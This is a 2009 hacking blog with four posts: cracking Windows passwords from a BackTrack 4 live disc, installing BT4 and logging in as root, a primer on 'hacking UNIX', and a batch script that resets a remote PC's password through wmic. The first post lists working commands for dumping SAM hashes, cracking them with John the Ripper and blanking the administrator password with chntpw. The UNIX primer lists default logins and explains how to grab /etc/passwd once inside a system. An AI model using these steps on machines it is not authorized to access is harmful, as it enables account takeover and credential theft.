Monday, 26 October 2009

Crack Windows password with Back Track 4

In this tutorial we see how to crack Windows password with BT 4.

  • Boot from live DVD of BT4 then start GUI mode with command "startx"

  • Now first thing we want to know that in BT out HDD will appear as "hda" or "sda" device so we check with following command "dmesg | grep hda" this command will show which devices are mount as hda my HDD is also mount in hda1.
  • We need to mount this HDD using following command but first need to start modprobe so type following command "modprobe fuse"

  • For mounting hda1 use following command "ntfsmount /dev/hda1 /mnt/hda1 -o force" we use force option because some times HDD will have dirty sector so we not able mount with out that "-o force" command.
  • Then need to type "mount" so we will see our hda1 is mounted as "/mnt/hda1" and haves writable permission.

  • Now we need to use bkhive with following command "bkhive /mnt/hda1/WINDOWS/system32/config/system anishsys.txt" (NOTE: Linux is case sensitive so "WINDOWS" word should be in Caps.)
  • We use samdump for get hash of sam file with following command "samdump2 /mnt/hda1/WINDOWS/system32/config/SAM anishsys.txt > pass.txt" (NOTE : "WINDOWS" & "SAM" in caps.)
  • So we have Hash in pass.txt we can crack this hash file using "john ripper"
  • First we need to copy pass.txt file in john directory so use following command "cp pass.txt /pentest/passwords/jtr"
  • And use command for cracking hash "./john pass.txt"

That how we can crack windows hash is just five minute. but if there password is in complex policy so it will may be hard to crack with john so we can use rainbow tables for crack password up to 14 characters.

Alternative we can blank administrator password in just in 2 min.
For that go to Shell Console type following command :

CODE :
"chntpw /mnt/hda1/WINDOWS/system32/config/SAM"
then press "1" key and "y" done.

Administrator password is blank.

Sunday, 25 October 2009

Installing Back Track 4



  • Back Track is best Linux OS thats Available for Ethical hacking & penetrations use because its have most popular software in that so we can use for Hacking.
  • So for that reason Backtrack is become popular for all those who want to learn or do hacking stuff.
  • backtrack 4 is pre launch that have really good programs in build but for customization we need to install backtrack in our hard disk so in this tutorial i will show you how to install backtrack 4 in HDD.
  • We use virtual machine for installing like VMWARE because Linux base OS have some hardware compatibility issue in vmware we don't need additional driver package for installation.
  • Start this tutorial.

  • After booting for BT4 live DVD you need to go GUI version of backtrack so need to type command "startx"
  • When GUI has started open terminal page & type command "ubiquity" installer will start.
  • In installer first page will ask you "Location" so select your region like mine India so i need to select the city kolkota then click on "forward".
  • Second page of installer will ask about "keyboard layout" by-default it will highlight on USA but you can change it of your suitable layout. then click on "forward".
  • Third page is prepare disk space chose "Guided -use all disk" size of 8 GB as i want to say that this BT 4 need 4 GB default installation size so use 8GB virtual HDD because if in farther we need to do some kind of modification so we need some empty disk space.
  • Step five "Who are you?" its a login information so file that but remember that login name is in small linux doesn't support Caps. latter's & need to enter password just use a single word like min i use Log in name= indian & password= 1. look on that last line "What is the name of this computer?" its really important cause is will reflect after you log in so i use "IndianBox" then click on "forward".
  • Step seven "Ready to Install" it will give you brif details where you you see Language, name, login name & location see if that information is according right for you if you need to do some changes click on back button or click install for start Installation.
  • Installing system will start it will automatically creates Ext3 partition for boot root & all.
  • Installation complete click on "Restart now"
  • when restarting it will ask you "remove disk then press ENTER:" just press enter key remember when system will restart go to boot menu select boor from HDD to bring BT4 start from hard disk.
  • At start it will ask you Login: enter user name & password like mine
Code: ( in red thats screen will shows and Blue i enter command)

IndianBox login: indian
Password : 1 (you will not see any password you type just type correct password and press enter key)
Install complete
  • you will get following command
Code: ( in red thats screen will shows and Blue i enter command)

indian@IndianIndianBOX:-$

  • But there was some problem i don't have full root access so some of my program will ask me authentication for root password and about me i don't like any restriction so i always want to login with root account because it will have full rights so lest remove this user for next time we directly enter root user name and password for login and gets root access that y i choose simple password for Indian user login so we can simply remove that. so we start now.

  • After login with indian user i will type following command.
Code: ( in red thats screen will shows and Blue i enter command)

indian@IndianIndianBOX:-$ sudo su
[ sudo ] password for indian: 1 (you will not see any password you type just type correct password and press enter key)
root@IndianBOX:/home/indian# passwd (this will change root password by default root password is toor so anyone can use that so i will change is for my safety)
Enter new UNIX password: (enter new password here)
Retype new UNIX password: (enter new password here again)
password: password update successfully
root@IndianBOX:/home/indian# exit
indian@IndianIndianBOX:-$ exit

  • Now login with root always.
Code: ( in red thats screen will shows and Blue i enter command)
IndianBOX login: root
Password:
root@IndianBOX:~#
(this is alternative for you but as i says i don't need any restrictions so i need to remove use indian from my BT4 so here is the command.)

Code:
( in red thats screen will shows and Blue i enter command)
root@IndianBOX:~# userdel indian
root@IndianBOX:~# rm -rf /home/indian/
(done i remove indian user from BT4 now we will start GUI White root)
root@IndianBOX:~# startx

Original post my Anish M (please give me credit if you use this post in other site)

Monday, 19 October 2009

A BEGINNERS OF UNIX

I always listen that the people says that Linux is very hard OS (operating system) to work on it. But the truth is that Linux is as simple as if u know the command line of Linux  Linux is a UNIX based OS here i show you some simple basic commands of UNIX with hacking way & hop that will clear some of basic Hacking UNIX OS.

1. HOW TO TELL IF/IF NOT YOU ARE ON A UNIX SYSTEM: UNIX SYSTEMS ARE QUITE COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;)
PASSWORD:

NOTE: WHEN HACKING ON A UNIX SYSTEM IT IS BEST TO USE LOWERCASE BECAUSE THE UNIX SYSTEM COMMANDS ARE ALL DONE IN LOWER- CASE.

2. LOGIN; IS A 1-8 CHARACTER FIELD. IT IS USUALLY THE NAME (I.E. ANISH OR INDIA) OF THE USER, OR INITIALS (I.E. M.ANISH OR L.INDIA). HINTS FOR LOGIN NAMES CAN BE FOUND TRASHING THE LOCATION OF THE DIAL-UP (USE YOUR CN/A TO FIND WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD ASSIGNED BY THE SYSOP OR CHOSEN BY THE USER.

COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
TEST TEST
UNIX UNIX
BIN BIN
IF YOU GUESS A LOGIN NAME AND YOU ARE NOT ASKED FOR A PASSWORD, AND HAVE ACCESSED TO THE SYSTEM, THEN YOU HAVE WHAT IS KNOWN AS A NON-GIFTED ACCOUNT. IF YOU GUESS A CORRECT LOGIN AND PASS- WORD, THEN YOU HAVE A USER ACCOUNT. AND, IF YOU GUESS THE ROOT PASSWORD, THEN YOU HAVE A "SUPER-USER" ACCOUNT.

3. ALL UNIX SYSTEMS HAVE THE FOLLOWING INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:
$
%
#


BUT CAN BE JUST ABOUT ANYTHING THE SYSOP OR USER WANTS IT TO BE.

4. THINGS TO DO WHEN YOU ARE IN: SOME OF THE COMMANDS THAT YOU MAY WANT TO TRY FOLLOW BELOW:

who is on (SHOWS WHO IS CURRENTLY LOGGED ON THE SYSTEM.)

ls -a (LIST ALL FILES IN CURRENT DIRECTORY.)

du -a (CHECKS AMOUNT OF MEMORY YOUR FILES USE;DISK USAGE)

cd\name (NAME IS THE NAME OF THE SUB-DIRECTORY YOU CHOOSE)

cd\ (BRINGS YOUR HOME DIRECTORY TO CURRENT USE)

cat name (NAME IS A FILENAME EITHER A PROGRAM OR DOCUMENTATION YOUR USERNAME HAS WRITTEN)

5. MOST UNIX PROGRAMS ARE WRITTEN IN THE C LANGUAGE OR PASCAL SINCE UNIX IS A PROGRAMMERS' ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE SYSTEM IS PRINT UP OR CAPTURE (IN A BUFFER) THE FILE CONTAINING ALL USER NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:

CAT /ETC/PASSWD

IF YOU ARE SUCCESSFUL YOU WILL A LIST OF ALL ACCOUNTS ON THE SYSTEM.IT SHOULD LOOK LIKE THIS:

ROOT:HVNSDCF:0:0:ROOT DIR:/:
ANISH:MAJDNFD:1:1:ANISH COOL:/BIN:/BIN/ANISH
INDIA::1:2:INDIA SMITH:/BIN:/BIN/INDIA

THE "ROOT" LINE TELLS THE FOLLOWING INFO :

LOGIN NAME =ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY

IN THE ANISH LOGIN, THE LAST PART "/BIN/ANISH " TELLS US WHICH DIRECTORY IS HIS HOME DIRECTORY (ANISH) IS.

IN THE "INDIA" EXAMPLE THE LOGIN NAME IS FOLLOWED BY 2 COLONS, THAT MEANS THAT THERE IS NO PASSWORD NEEDED TO GET IN USING HIS NAME.




Sunday, 4 October 2009

CHANGE PASSWORD IN NETWORK PC

Some time you want to change the administrator password of a pc in your network you know the current password and want to renew that password with out going to that pc or which out taking net meeting the following batch file will help you for same. just copy below code & paste in notepad
code:
@echo off
title password chenger
COLOR 07
echo network administrator password renewer.
echo creator Anish M
echo http://www.webmasti.co.nr
echo hrrp://www.indianehacker.blogspot.com
set /p ip=ENTER IP ADDRESS :
CLS
set /p user=ENTER USER NAME :
CLS
set /p pass=ENTER CURRENT PASSWORD :
CLS
ECHO PROVIDE NEW PASSWORD DETAILS
set /p pwd=ENTER NEW PASSWORD:
CLS
ECHO YOUR NEW PASSWORD FOR %IP% COMPUTER %user% IS %PWD%
COLOR 04
ECHO NOTE :PASSWORD WILL CHANGE FOR THE IP ADDRESS YOU PROVIDED.
ECHO ARE YOU WANT TO PROSEED
SET /P Y= TYPE Y or N:
CLS
COLOR 07
GOTO %Y%

: Y
msg * "YOUR NEW PASSWORD FOR %IP% COMPUTER %user% IS %PWD%"
wmic /node:%ip% /user:%user% /password:%pass% process call create "net user %user% %pwd%"
END

: N
END

save this notepad as "Network password reseter.bat" without quotes.
  • double click that batch file.
  • Enter ip address press enter.
  • Enter user name that you want to change password.
  • Enter old (current password) of that user id.
  • Enter new password.
  • Confirm the new password.
Done the password will renew .
Ping your blog